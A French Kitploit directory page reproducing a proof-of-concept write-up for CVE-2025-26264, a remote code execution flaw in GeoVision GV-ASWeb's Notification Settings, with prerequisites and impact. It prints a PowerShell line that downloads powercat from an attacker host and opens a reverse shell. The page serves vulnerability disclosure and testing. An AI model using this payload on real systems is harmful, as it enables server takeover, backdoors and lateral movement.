Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-26264 — CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise. | Kitploit
Outils/GitHubGitHub/hxlxmj/cve-2025-26264
Vulnerability AnalysisExploitationLateral MovementWeb Application ExploitationPenetration TestingRed Teaming
GitHubhxlxmj/cve-2025-26264

CVE-2025-26264

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2025-26264 - GeoVision GV-ASWeb with the version 6.1.2.0 or less, contains a Remote Code Execution (RCE) vulnerability within its Notification Settings feature. An authenticated attacker with "System Settings" privileges in ASWeb can exploit this flaw to execute arbitrary commands on the server, leading to a full system compromise.

Site web
Partager

CVE-2025-26264

CVE-2025-26264 - GeoVision GV-ASWeb version 6.1.2.0 ou inférieure contient une vulnérabilité d'exécution de code à distance (RCE) dans sa fonctionnalité Notification Settings. Un attaquant authentifié disposant des privilèges "System Settings" dans ASWeb peut exploiter cette faille pour exécuter des commandes arbitraires sur le serveur, entraînant une compromission totale du système.

Prérequis

Pour qu'une attaque réussisse, un attaquant doit disposer de :

  • Un accès réseau à l'application web GV-ASManager version 6.1.2.0 ou inférieure ;
  • Un accès à un compte disposant du privilège de gestion de la fonctionnalité Notification Settings.

Impact

La vulnérabilité peut être exploitée pour réaliser les actions non autorisées suivantes :

  • Un compte disposant du privilège de gestion de la fonctionnalité Notification Settings peut :
    • Effectuer une attaque d'exécution de code à distance.
  • Après une attaque réussie, un attaquant pourra :
    • Accéder, modifier ou supprimer des informations système sensibles ;
    • Installer une porte dérobée sur le système ;
    • Mener une attaque par ransomware ;
    • Effectuer un mouvement latéral dans le réseau interne.

CVE-2025-26264 PoC [Test de GeoVision v6.1.2.0]

L'exploitation de la vulnérabilité d'exécution de code à distance dans la plateforme ASWeb de GeoVision GV-ASManager est possible sur les versions 6.1.2.0 ou inférieures (aucun correctif n'est disponible au 26 février 2025).

La fonction Notification Setting d'ASWeb de GeoVision ASManager est vulnérable à l'exécution de code à distance (RCE)

Requête HTTP de configuration d'une notification sur un événement spécifique : tentative de connexion TAWeb échouée

Selon ce script, s'il y a une tentative de connexion TAWeb échouée, le script PowerShell suivant sera exécuté :

powershell.exe Set-ExecutionPolicy Bypass -Force;IEX(New-Object System.Net.WebClient).DownloadString('http://LHOST/powercat.ps1');powercat -c LHOST -p LPORT -e powershell

Une tentative d'authentification échouée dans TAWeb

Hôte de la victime : le script ouvre une porte dérobée vers l'hôte de l'attaquant.

Hôte de l'attaquant : l'attaquant obtient un shell

Contact

Si vous avez une question, vous pouvez me contacter, Giorgi Dograshvili, sur LinkedIn.

Télécharger l’outil